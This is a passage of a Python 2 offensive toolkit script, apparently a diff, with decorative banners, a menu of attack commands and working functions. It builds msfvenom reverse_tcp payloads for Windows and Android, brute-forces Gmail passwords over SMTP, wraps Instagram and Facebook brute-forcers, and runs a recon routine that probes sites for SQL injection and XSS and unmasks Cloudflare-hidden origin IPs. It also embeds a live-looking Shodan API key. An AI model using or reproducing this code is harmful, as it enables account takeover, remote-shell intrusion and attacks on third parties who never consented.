██║ -██║ ██║██║ ██║╚██████╗██║ ██╗███████╗██║ ██║███████║ ██║ ╚██████╔╝╚██████╔╝███████╗ ██║ ██╗██║ ██║ -╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═════╝ ╚═════╝ ╚══════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ - - - """.decode('utf-8') -def mainbanner13(): - print """\033[92m - - -██╗ ██╗ █████╗ ██████╗██╗ ██╗███████╗██████╗ ███████╗ ████████╗ ██████╗ ██████╗ ██╗ ██╗ ██╗██╗████████╗ -██║ ██║██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗██╔════╝ ╚══██╔══╝██╔═══██╗██╔═══██╗██║ ██║ ██╔╝██║╚══██╔══╝ -███████║███████║██║ █████╔╝ █████╗ ██████╔╝███████╗█████╗██║ ██║ ██║██║ ██║██║█████╗█████╔╝ ██║ ██║ -██╔══██║██╔══██║██║ ██╔═██╗ ██╔══╝ ██╔══██╗╚════██║╚════╝██║ ██║ ██║██║ ██║██║╚════╝██╔═██╗ ██║ ██║ -██║ ██║██║ ██║╚██████╗██║ ██╗███████╗██║ ██║███████║ ██║ ╚██████╔╝╚██████╔╝███████╗ ██║ ██╗██║ ██║ -╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═════╝ ╚═════╝ ╚══════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ - - - """.decode('utf-8') -def mainbanner14(): - print """\033[34m - - -██╗ ██╗ █████╗ ██████╗██╗ ██╗███████╗██████╗ ███████╗ ████████╗ ██████╗ ██████╗ ██╗ ██╗ ██╗██╗████████╗ -██║ ██║██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗██╔════╝ ╚══██╔══╝██╔═══██╗██╔═══██╗██║ ██║ ██╔╝██║╚══██╔══╝ -███████║███████║██║ █████╔╝ █████╗ ██████╔╝███████╗█████╗██║ ██║ ██║██║ ██║██║█████╗█████╔╝ ██║ ██║ -██╔══██║██╔══██║██║ ██╔═██╗ ██╔══╝ ██╔══██╗╚════██║╚════╝██║ ██║ ██║██║ ██║██║╚════╝██╔═██╗ ██║ ██║ -██║ ██║██║ ██║╚██████╗██║ ██╗███████╗██║ ██║███████║ ██║ ╚██████╔╝╚██████╔╝███████╗ ██║ ██╗██║ ██║ -╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═════╝ ╚═════╝ ╚══════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ - - - """.decode('utf-8') -def mainbanner15(): - print """\033[93m - __ _ - _wr"" "-q__ - _dP 9m_ - _#P 9#_ - d#@ \033[92mtype ? for help\033[93m 9#m - d## ### - J### ###L - {###K J###K - ]####K ___aaa___ J####F - __gmM######_ w#P"" ""9#m _d#####Mmw__ - _g##############mZ_ __g##############m_ - _d####M@PPPP@@M#######Mmp gm#########@@PPP9@M####m_ - a###"" ,Z"#####@" '######"\g ""M##m - J#@" 0L "*## ##@" J# *#K - #" `# "_gmwgm_~ dF `#_ -7F "#_ ]#####F _dK JE -] *m__ ##### __g@" F - \033[92m@tuf_unkn0wn\033[93m "PJ#####LP" \033[92mhackers-tool-kit\033[93m - ` 0######_ ' - _0########_ - . _d#####^#####m__ , - "*w_________am#####P" ~9#####mw_________w*" - ""9@#####@M"" ""P@#####@M"" -\033[92m - ██░ ██ ▄▄▄█████▓ ██ ▄█▀ - ▓██░ ██▒▓ ██▒ ▓▒ ██▄█▒ - ▒██▀▀██░▒ ▓██░ ▒░▓███▄░ - ░▓█ ░██ ░ ▓██▓ ░ ▓██ █▄ - ░▓█▒░██▓ ▒██▒ ░ ▒██▒ █▄ - ▒ ░░▒░▒ ▒ ░░ ▒ ▒▒ ▓▒ - ▒ ░▒░ ░ ░ ░ ░▒ ▒░ - ░ ░░ ░ ░ ░ ░░ ░ - ░ ░ ░ ░ ░\033[0m - """.decode('utf-8') -def mainbanner16(): - print """\033[91m - :PB@Bk: - ,jB@@B@B@B@BBL. - 7G@B@B@BMMMMMB@B@B@Nr - :kB@B@@@MMOMOMOMOMMMM@B@B@B1, - :5@B@B@B@BBMMOMOMOMOMOMOMM@@@B@B@BBu. - 70@@@B@B@B@BXBBOMOMOMOMOMOMMBMPB@B@B@B@B@Nr - G@@@BJ iB@B@@ OBMOMOMOMOMOMOM@2 B@B@B. EB@B@S - @@BM@GJBU. iSuB@OMOMOMOMOMOMM@OU1: .kBLM@M@B@ - B@MMB@B 7@BBMMOMOMOMOMOBB@: B@BMM@B - @@@B@B 7@@@MMOMOMOMM@B@: @@B@B@ - @@OLB. BNB@MMOMOMM@BEB rBjM@B - @@ @ M OBOMOMM@q M .@ @@ - @@OvB B:u@MMO\033[31mMOMMBJiB .BvM@B - @B@B@J 0@B@MMOMOMOMB@B@u q@@@B@ - B@MBB@v G@@BMMMMMMMMMMMBB@5 F@BMM@B - @BBM@BPNi LMEB@OMMMM@B@MMOMM@BZM7 rEqB@MBB@ - B@@@BM B@B@B qBMOMB@B@B@BMOMBL B@B@B @B@B@M - J@@@@PB@B@B@B7G@OMBB. ,@MMM@qLB@B@@@BqB@BBv - iGB@,i0@M@B@MMO@E : M@OMM@@@B@Pii@@N: - . B@M@B@MMM@B@B@B@MMM@@@M@B - @B@B.i@MBB@B@B@@BM@::B@B@ - B@@@ .B@B.:@B@ :B@B @B@O - :0 r@B@ B@@ .@B@: P: - vMB :@B@ :BO7 - ,B@B\033[0m - - \033[32m╔═══\033[93m+\033[0mHackers-Tool-Kit\033[93m+\033[32m════╗\033[0m - ███████████████████████████ - type █?█ for help - ███ - \033[31m▄▄ ▄▄ \033[0m███\033[31m ▄▄ ▄▄▄ - ██ ██ \033[0m███\033[31m ██ ██▀ - ██ ██ \033[0m███\033[31m ██▄██ - ████████ \033[0m███\033[31m █████ - ██ ██ \033[0m███\033[31m ██ ██▄ - ██ ██ \033[0m███\033[31m ██ ██▄ - ▀▀ ▀▀ \033[0m▀▀▀\033[31m ▀▀ ▀▀\033[0m - """.decode('utf-8') -def mainbanner17(): - print """ - - .---. - |---| - type |-\033[32m?\033[0m-| for help - |---| - .---^ - ^---. - :___________: - \033[31m▄█ █▄\033[0m | |//| \033[32m▄█ ▄█▄\033[0m - ███ ███ | |//| ███ ▄███▀ - ███ ███ | |//| ███▐██▀ - ███▄▄▄▄███ | |//| █████▀ - ███▀▀▀▀███ | |//| █████▄ - ███ ███ | |//| ███▐██▄ - ███ ███ | |.-| ███ ▀███▄ - \033[31m███ ███\033[0m |.-'**| \033[32m███ ▀█▀\033[0m - \***/ - \*\033[91m/\033[31m - V\033[0m - """.decode('utf-8') -def mainbanner18(): - print """ - Type \033[31m?\033[0m For\033[31m Help\033[0m -\033[31m╔═══╗ ╔═══╗ ╔═════════════════════╗ ╔═══╗ ╔═══╗ -║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTKHTKHTKHTKHTKHTKHTK\033[31m║ ║\033[0mHTK\033[31m║ ╔╝\033[0mHTK\033[31m║ -║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTKHTKHTKHTKHTKHTKHTK\033[31m║ ║\033[0mHTK\033[31m║ ╔═╝\033[0mHTK\033[31m╔╝ -║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ╚════════╗\033[0mHTK\033[31m╔════════╝ ║\033[0mHTK\033[31m║ ╔╝\033[0mHTK\033[31m╔═╝ -║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║╔╝\033[0mHTK\033[31m╔╝ -║\033[0mHTK\033[31m╚═══════════╝\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m╚╝\033[0mHTK\033[31m╔╝ -║\033[0mHTKHHHHHHHHHHHHHHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTK HTK\033[31m╔╝ -║\033[0mHTKTTTTTTTTTTTTTHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTKHTK \033[31m╚╗\033[0m -║\033[31mHTKKKKKKKKKKKKKKHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m╔╗\033[31mHTK\033[0m╚═╗ -║\033[31mHTK\033[0m╔═══════════╗\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║╚═╗\033[31mHTK\033[0m╚╗ -║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ╚╗\033[31mHTK\033[0m╚╗ -║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ╚╗\033[31mHTK\033[0m╚╗ -║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ╚╗\033[31mHTK\033[0m╚╗ -║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ╚╗\033[31mHTK\033[0m║ -╚═══╝ ╚═══╝ ╚═══╝ ╚═══╝ ╚═══╝ - """.decode('utf-8') -def mainbanner19(): - print """\033[31m - # # - # # - %# \033[0m@tuf_unkn0wn\033[31m ## - ,%/ /%, - %## ##% - &%## ##%& - ,%%#####/. ,/#####%%, - %&%%#####/ \033[0m████\033[31m /#####%%&% - .&&%%%&& \033[0m████\033[31m &&%%%&&. - /&%( \033[0m████\033[31m (%&( - \033[0m████ - ████ - ████ - ████ - ████ - ████ - ████ - ████ - ████ - ████ - ████ - ████ - ████ - ████ - ████ - \033[31m██████\033[31m type \033[0m█\033[31m??\033[0m█ \033[31mfor help ██████ -██ \033[0m██████████████████████████████\033[31m ██ -███████ \033[0m██████████████████████████████\033[31m ███████ -██ ██ \033[0m████ \033[31m ██ ██ - ██████ \033[0m████ \033[31m ██████ - ▒ ▓▒ ▒ ▒ ▓▒ ▒ - ░ ▒ ░ ██████ ░ ▒ ░ - ░ ░ ██ ░ ░ - ███████ - ██ ██ - ██████ - ▒ ▓▒ ▒ - ░ ▒ ░ - ░ ░\033[0m - """.decode('utf-8') -def mainbanner20(): - print """ - - - ██╗\033[31m██╗ ██╗\033[0m██╗ ██╗\033[92m████████╗\033[0m██╗ ██╗\033[34m██╗ ██╗\033[0m██╗ - ██╔╝\033[31m██║ \033[31m██║\033[0m╚██╗ ██╔╝\033[92m╚══\033[92m██╔══╝\033[0m╚██╗ ██╔╝\033[34m██║ ██╔╝\033[0m╚██╗ -██╔╝ \033[31m███████║ \033[0m╚██╗██╔╝\033[92m ██║ \033[0m╚██╗██╔╝\033[34m █████╔╝ \033[0m╚██╗ -╚██╗ \033[31m██╔══██║ \033[0m██╔╝╚██╗ \033[92m██║ \033[0m ██╔╝╚██╗\033[34m ██╔═██╗\033[0m ██╔╝ - ╚██╗\033[31m██║ ██║\033[0m██╔╝ ╚██╗\033[92m ██║ \033[0m ██╔╝ ╚██╗\033[34m██║ ██╗\033[0m██╔╝ - ╚═╝\033[31m╚═╝ ╚═╝\033[0m╚═╝ ╚═╝\033[92m ╚═╝ \033[0m ╚═╝ ╚═╝\033[34m╚═╝ ╚═╝\033[0m╚═╝ - - - """.decode('utf-8') - - -def mainbanner(): - import random - for x in range(10): - num = random.randint(1,20) - if num == 1: - mainbanner1() - if num == 2: - mainbanner2() - if num == 3: - mainbanner3() - if num == 4: - mainbanner4() - if num == 5: - mainbanner5() - if num == 6: - mainbanner6() - if num == 7: - mainbanner7() - if num == 8: - mainbanner8() - if num == 9: - mainbanner9() - if num == 10: - mainbanner10() - if num == 11: - mainbanner11() - if num == 12: - mainbanner12() - if num == 13: - mainbanner13() - if num == 14: - mainbanner14() - if num == 15: - mainbanner15() - if num == 16: - mainbanner16() - if num == 17: - mainbanner17() - if num == 18: - mainbanner18() - if num == 19: - mainbanner19() - if num == 20: - mainbanner20() -#--------------------------# -#MAIN STARTING BANNER END# - - -#HELP BANNER START# -#-----------------# -def help(): - print B+""" -▒▒ ▓▒█░▒ ▒▓▒ ▒ ░ ▒▒▓ ▒ ▒ ░ ░▒ ▒ ▒ ░░▒░▒▒▓▒▒░ ▒▓▒▒░ ▒ ░ ░ ▒░ ▒ ▒ - ▒ ▒▒ ░░ ░▒ ░ ░ ░ ▒ ▒ ░ ░ ░ ▒ ░▒░ ░▒ ░▒░ ▒ ░▒░ ░ ░ ░░ ░ ▒░ - ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ - ░ ░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ -\033[0m ░ -? : displays this message -update : update the hackers-tool-kit -clear : clears screen -banner : clears screen and shows new banner -exit : exits script -restart : re run hackers-tool-kit -rebootl : reboot whole device -winload : windows reverse_tcp payload -andload : android reverse_tcp payload -connect : connect to a host -command : execute terminal command -msfcon : metasploit console -set : setoolkit console -msfven : msfvenom -gmail : gmail bruteforce -insta : instagram bruteforce -fb : facebook bruteforce -hydra : Black-Hydra bruteforce -medusa : Medusa bruteforce -ipgrab : host to ip address -myip : show your ip -wifite : automated wifi hacker -reaver : reaver automated [ wifi hack ] -aircrack: aircrack-ng automated [ wifi hack ] -mon : put device in monitor mode -monoff : put device out of monitor mode -netdev : find all devices in your network -scannet : scan for networks around you -specnet : scan a specific network -port : scan for ports on a host -info : info gather on a host [includes port scan]\033[91m █████████████████████ \033[0m -sysinfo : info about your system \033[91m ██ ██\033[0m -msfex : shows all metasploit exploits \033[91m ██ ██\033[0m -msfpa : shows all metasploit payloads \033[91m ██\033[90m ██ ██\033[91m ██\033[0m -msfau : shows all metasploit auxiliarys \033[91m ██\033[90m ██ ██\033[91m ██\033[0m -msfall : shows all metasploit modules \033[91m ██ ██\033[0m -udp : UDP flood / dos \033[91m ██ \033[90m █ \033[91m ██\033[0m -tcp : TCP flood / dos \033[91m ██\033[90m █ \033[91m ██\033[0m -syn : SYN flood / dos \033[91m █ █\033[0m -slowl : Slow Loris dos \033[91m █ █ \033[0m -ping : pings host \033[91m █ █\033[0m -multih : start a multi handler \033[91m █ █\033[0m -cupp : make wordlists \/ vvvvvvvvv \/ -vdir : view files of a directory -vpn : activate a vpn -vpnoff : stop vpn -pidox : dox website -pingen : Generate a routers default pin -deauth : deauth attack / wifi jammer -macc : changes mac address -macoff : returns mac address to normal Hackers-Tool-Kit -arpspoof: arp spoofing | -sslscan : ssl scan a host ██╗ ██╗ ████████╗ ██╗ ██╗ -payload : make a metasploit payload of your choice ██║ ██║ ╚══██╔══╝ ██║ ██╔╝ -crunch : Make wordlists ███████║\033[91m█████\033[0m╗██║\033[91m█████\033[0m╗█████╔╝ -traff : shows your internet traffic ██╔══██║╚════╝██║╚════╝██╔═██╗ -resa : reset account password ██║ ██║ ██║ ██║ ██╗ -resu : reset unix password ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ -hashid : find the type of hash of a hash | -wafwoof : check a web application for firewall Hackers-Tool-Kit -cloud : cloudflare bypass -brutex : auto bruteforce every service of a host -methelp : show meterpreter help -winbyp : windows defender bypass -exploit : use a metasploit exploit of your choice -phish : phishing automated -datalist: list all hosts & services in the database -msfev : shows all metasploit evasions -upgrade : fully update your linux os -nscript : use a nmap script -sshver : scan for ssh version on a host -chains : browse web anonymous via proxychains [proxychains setup required] -mysqlv : scan for mysql version on a host -terminal: open another new terminal -source : get source code from a website -dirscan : web directory scanner / bruteforce -aserver : start a apache server -run : run a file -phpload : make a php reverse_tcp payload and start it in a multi handler -pyload : make a python reverse_tcp payload and start it in a multi handler -foxhis : gather firefox history from privileged javascript shell -rhawk : run the RED_HAWK script (info gathering tool) -nano : open nano text editor -compilec: compile a c file -\033[91m---------------------------------------------------------------------------------\033[0m - """ -#-----------------# -#HELP BANNER END# - - -#WINDOWS REVERSE TCP PAYLOAD START# -#---------------------------------# -def winload(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - pf = raw_input("Port: ") - na = raw_input("Name of File: ") - ak = 'msfvenom -p windows/meterpreter/reverse_tcp LPORT={0} -f exe -o /root/{1}.exe LHOST={2}'.format(pf,na,ipaddr) - os.system(ak) -#-------------------------------# -#WINDOWS REVERSE TCP PAYLOAD END# - - -#ANDROID REVERSE TCP PAYLOAD START# -#---------------------------------# -def andload(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - pf = raw_input("Port: ") - na = raw_input("Name of File: ") - ak = 'msfvenom -p android/meterpreter/reverse_tcp LPORT={0} -o /root/{1}.apk LHOST={2}'.format(pf,na,ipaddr) - os.system(ak) -#-------------------------------# -#ANDROID REVERSE TCP PAYLOAD END# - -#GMAIL BRUTEFORCE START# -#----------------------# -def gmail(): - #!/usr/bin/python - '''create by Ha3MrX''' - - import smtplib - from os import system - - def main(): - print '\033[93m=================================================' - print '\033[91m create by Ha3MrX ' - print '\033[93m=================================================' - print '\033[95m ++++++++++++++++++++ ' - print '\n ' - print '\033[92m _,. ' - print ' ' - print ' ' - print ' HA3MrX ' - print ' _,. ' - print ' ,` -.) ' - print ' ( _/-\\-._ ' - print ' /,|`--._,-^| , ' - print ' \_| |`-._/|| , | ' - print ' | `-, / | / / ' - print ' | || | / / ' - print ' `r-._||/ __ / / ' - print ' __,-<_ )`-/ `./ / ' - print ' \ `--- \ / / / ' - print ' | |./ / ' - print ' / // / ' - print ' \_/ \ |/ / ' - print ' | | _,^- / / ' - print ' | , `` (\/ /_ ' - print ' \,.->._ \X-=/^ ' - print ' ( / `-._//^` ' - print ' `Y-.____(__} ' - print ' | {__) ' - print ' () \033[91m V.1.0 ' - - main() - print '\033[0m[1] start the attack' - print '[2] exit' - option = input('==>') - if option == 1: - file_path = raw_input('path of passwords file :') - else: - system('clear') - exit() - pass_file = open(file_path,'r') - pass_list = pass_file.readlines() - def login(): - i = 0 - user_name = raw_input('target email :') - server = smtplib.SMTP_SSL('smtp.gmail.com', 465) - server.ehlo() - for password in pass_list: - i = i + 1 - print str(i) + '/' + str(len(pass_list)) - try: - server.login(user_name, password) - system('clear') - main() - print '\n' - print '[+] This Account Has Been Hacked Password :' + password + ' ^_^' - break - except smtplib.SMTPAuthenticationError as e: - error = str(e) - if error[14] == '<': - system('clear') - main() - print '[+] this account has been hacked, password :' + password + ' ^_^' - - break - else: - print '[!] password not found => ' + password - login() -#--------------------# -#GMAIL BRUTEFORCE END# - -#PORT SCAN START# -#---------------# -def port(): - n = raw_input("Enter Target: ") - os.system("nmap " + n) -#-------------# -#PORT SCAN END# - -#INSTAGRAM BRUTEFORCE START# -#--------------------------# -def insta(): - insta = raw_input("USERNAME> ") - jl = raw_input("WORDLIST> ") - k = raw_input("THREADS> ") - ma = 'python /root/hackers-tool-kit/tools/instagram.py {0} {1} {2}'.format(insta,jl,k) - os.system(ma) -#------------------------# -#INSTAGRAM BRUTEFORCE END# - -#FACEBOOK BRUTEFORCE START# -#-------------------------# -def fb(): - facebook = raw_input("[EMAIL/ID->]: ") - word = raw_input("[WORDLIST->]: ") - ks = 'cd /root/hackers-tool-kit/tools && perl fb-brute.pl {0} {1}'.format(facebook,word) - os.system(ks) -#-----------------------# -#FACEBOOK BRUTEFORCE END# - -#HOST TO IP START# -#----------------# -def ipgrab(): - b = raw_input(Y+'Enter Host:\033[0m ') - ip = socket.gethostbyname(b) - print G+"------------------------\033[0m" - print N+"Host: ", b - print N+"IP: ", ip - print G+"------------------------\033[0m" -#--------------# -#HOST TO IP END# - -#YOUR OWN IP START# -#-----------------# -def myip(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - print ("IP: ", ipaddr, " Gateway:", gateway, " Host:", host) - print "\n Router IP" - print "----------------------------\033[92m" - os.system('curl "http://myexternalip.com/raw"') - print "\n\033[0m----------------------------" -#---------------# -#YOUR OWN IP END# - - -#AUTOMATED WIFI HACK START# -#-------------------------# -def wifite(): - os.system("wifite") -#-----------------------# -#AUTOMATED WIFI HACK END# - - -#MONITOR MODE START# -#------------------# -def mon(): - os.system("iwconfig") - i = raw_input("Select Interface: ") - os.system("airmon-ng start " + i) -#----------------# -#MONITOR MODE END# - - -#DEVICES IN THE NET START# -#------------------------# -def netdev(): - os.system("netdiscover") -#----------------------# -#DEVICES IN THE NET END# - - -#NETS AROUND YOU START# -#-----------------------# -def scannet(): - os.system("iwconfig") - m = raw_input("Select Interface: ") - print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" - j = raw_input("[y/n]> ") - if j == "y": - os.system("airodump-ng -w /root/SCAN " + m) - print Y+"! SCAN RESULTS SAVED IN /root/ DIRECTORY !\033[0m" - if j == "n": - os.system("airodump-ng " + m) -#---------------------# -#NETS AROUND YOU END# - - -#INFO SCAN HOST START# -#--------------------# -def info(): - params = [] - # Browser - br = mechanize.Browser() - - # Just some colors and shit - white = '\033[1;97m' - green = '\033[1;32m' - red = '\033[1;31m' - yellow = '\033[1;33m' - end = '\033[1;m' - info = '\033[1;33m[!]\033[1;m' - que = '\033[1;34m[?]\033[1;m' - bad = '\033[1;31m[-]\033[1;m' - good = '\033[1;32m[+]\033[1;m' - run = '\033[1;97m[~]\033[1;m' - - # Cookie Jar - cj = cookielib.LWPCookieJar() - br.set_cookiejar(cj) - - # Browser options - br.set_handle_equiv(True) - br.set_handle_redirect(True) - br.set_handle_referer(True) - br.set_handle_robots(False) - - # Follows refresh 0 but not hangs on refresh > 0 - br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) - br.addheaders = [ - ('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] - - - print '''\033[1;31m - _________ __ __ __ - / _____// |________|__| | __ ___________ - \_____ \\\\ __\_ __ \ | |/ // __ \_ __ \\ - / \| | | | \/ | <\ ___/| | \/ - /_______ /|__| |__| |__|__|_ \\\\___ >__| - \/ \/ \/\033[1;m''' - target = raw_input('\033[1;34m[?]\033[1;m Enter the target: ') - if 'http' in target: - parsed_uri = urlparse(target) - domain = '{uri.netloc}'.format(uri=parsed_uri) - else: - domain = target - try: - br.open('http://' + target) - target = 'http://' + target - except: - target = 'https://' + target - - def sqli(url): - print '%s Using SQLMap api to check for SQL injection vulnerabilities. Don\'t worry we are using an online service and it doesn\'t depend on your internet connection. This scan will take 2-3 minutes.' % run - br.open('https://suip.biz/?act=sqlmap') - br.select_form(nr=0) - br.form['url'] = url - req = br.submit() - result = req.read() - match = search(r"---(?s).*---", result) - if match: - print '%s One or more parameters are vulnerable to SQL injection' % good - option = raw_input( - '%s Would you like to see the whole report? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - print '\033[1;31m-\033[1;m' * 40 - print match.group().split('---')[1][:-3] - print '\033[1;31m-\033[1;m' * 40 - else: - print '%s None of parameters is vulnerable to SQL injection' % bad - - - def cms(domain): - try: - result = br.open('https://whatcms.org/?s=' + domain).read() - detect = search(r'class="nowrap" title="[^<]*">', result) - WordPress = False - try: - r = br.open(target + '/robots.txt').read() - if "wp-admin" in str(r): - WordPress = True - except: - pass - if detect: - print '%s CMS Detected : %s' % (info, detect.group().split('class="nowrap" title="')[1][:-2]) - detect = detect.group().split('">')[1][:-27] - if 'WordPress' in detect: - option = raw_input( - '%s Would you like to use WPScan? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - os.system('wpscan --random-agent --url %s' % domain) - elif WordPress: - print '%s CMS Detected : WordPress' % info - option = raw_input( - '%s Would you like to use WPScan? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - os.system('wpscan --random-agent --url %s' % domain) - else: - print '%s %s doesn\'t seem to use a CMS' % (info, domain) - except: - pass - - def honeypot(ip_addr): - result = {"0.0": 0, "0.1": 10, "0.2": 20, "0.3": 30, "0.4": 40, "0.5": 50, "0.6": 60, "0.7": 70, "0.8": 80, "0.9": 90, "1.0": 10} - honey = 'https://api.shodan.io/labs/honeyscore/%s?key=C23OXE0bVMrul2YeqcL7zxb6jZ4pj2by' % ip_addr - try: - phoney = br.open(honey).read() - if float(phoney) >= 0.0 and float(phoney) <= 0.4: - what = good - else: - what = bad - print '{} Honeypot Probabilty: {}%'.format(what, result[phoney]) - except KeyError: - print '\033[1;31m[-]\033[1;m Honeypot prediction failed' - - def whoisIt(url): - who = "" - print '{} Trying to gather whois information for {}'.format(run,url) - try: - who = str(whois.whois(url)).decode() - except Exception: - pass - test = who.lower() - if "whoisguard" in test or "protection" in test or "protected" in test: - print '{} Whois Protection Enabled{}'.format(bad, end) - else: - print '{} Whois information found{}'.format(good, end) - try: - data = json.loads(who) - for key in data.keys(): - print "{} :".format(key.replace("_", " ").title()), - if type(data[key]) == list: - print ", ".join(data[key]) - else: - print "{}".format(data[key]) - except ValueError: - print '{} Unable to build response, visit https://who.is/whois/{} {}'.format(bad, url, end) - pass - - def nmap(ip_addr): - port = 'http://api.hackertarget.com/nmap/?q=' + ip_addr - result = br.open(port).read() - result = sub(r'Starting[^<]*\)\.', '', result) - result = sub(r'Service[^<]*seconds', '', result) - result = os.linesep.join([s for s in result.splitlines() if s]) - print result - - def bypass(domain): - post = urlencode({'cfS': domain}) - result = br.open( - 'http://www.crimeflare.info/cgi-bin/cfsearch.cgi ', post).read() - - match = search(r' \b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b', result) - if match: - bypass.ip_addr = match.group().split(' ')[1][:-1] - print '%s Real IP Address : %s' % (good, bypass.ip_addr) - - def dnsdump(domain): - res = DNSDumpsterAPI(False).search(domain) - print '\n%s DNS Records' % good - for entry in res['dns_records']['dns']: - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - for entry in res['dns_records']['mx']: - print '\n%s MX Records' % good - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - print '\n\033[1;32m[+]\033[1;m Host Records (A)' - for entry in res['dns_records']['host']: - if entry['reverse_dns']: - print '{domain} ({reverse_dns}) ({ip}) {as} {provider} {country}'.format(**entry) - else: - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - print '\n%s TXT Records' % good - for entry in res['dns_records']['txt']: - print entry - print '\n%s DNS Map: https://dnsdumpster.com/static/map/%s.png\n' % (good, domain.strip('www.')) - - - def fingerprint(ip_addr): - try: - result = br.open('https://www.censys.io/ipv4/%s/raw' % ip_addr).read() - match = search(r'"os_description": "[^<]*"', result) - if match: - print '%s Operating System : %s' % (good, match.group().split('n": "')[1][:-5]) - except: - pass - - - ip_addr = socket.gethostbyname(domain) - print '%s IP Address : %s' % (info, ip_addr) - try: - r = requests.get(target) - header = r.headers['Server'] - if 'cloudflare' in header: - print '%s Cloudflare detected' % bad - bypass(domain) - try: - ip_addr = bypass.ip_addr - except: - pass - else: - print '%s Server: %s' % (info, header) - try: - print '%s Powered By: %s' % (info, r.headers['X-Powered-By']) - except: - pass - try: - r.headers['X-Frame-Options'] - except: - print '%s Clickjacking protection is not in place.' % good - except: - pass - fingerprint(ip_addr) - cms(domain) - try: - honeypot(ip_addr) - except: - pass - print "{}----------------------------------------{}".format(red, end) - whoisIt(domain) - try: - r = br.open(target + '/robots.txt').read() - print '\033[1;31m-\033[1;m' * 40 - print '%s Robots.txt retrieved\n' % good, r - except: - pass - print '\033[1;31m-\033[1;m' * 40 - nmap(ip_addr) - print '\033[1;31m-\033[1;m' * 40 - dnsdump(domain) - os.system('cd plugins && python theHarvester.py -d %s -b all' % domain) - try: - br.open(target) - print '%s Crawling the target for fuzzable URLs' % run - for link in br.links(): - if 'http' in link.url or '=' not in link.url: - pass - else: - url = target + '/' + link.url - params.append(url) - if len(params) == 0: - print '%s No fuzzable URLs found' % bad - quit() - print '%s Found %i fuzzable URLs' % (good, len(params)) - for url in params: - print url - sqli(url) - url = url.replace('=', '') - r = br.open(url).read() - if '' in r: - print '%s One or more parameters are vulnerable to XSS' % good - break - print '%s These are the URLs having parameters:' % good - for url in params: - print url - except: - pass -#------------------# -#INFO SCAN HOST END# - - -#INFO ON YOUR SYSTEM START# -#-------------------------# -def sysinfo(): - os.system("iwconfig") - k = raw_input("Interface: ") - os.system("clear") - os.system("ifconfig") - print "\n" - os.system("iwconfig") - print "\n" - os.system("neofetch") - print "\n" - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - print (" IP: ", ipaddr, " Gateway: ", gateway, " Host: ", host) - print "\n Router IP" - print "----------------------------\033[92m" - os.system('curl "http://myexternalip.com/raw"') - print "\n\033[0m----------------------------" - print "\n" - show = 'macchanger -s {0}'.format(k) - os.system(show) -#-----------------------# -#INFO ON YOUR SYSTEM END# - - -#ALL METASPLOIT EXPLOITS START# -#-----------------------------# -def msfex(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show exploits'""") 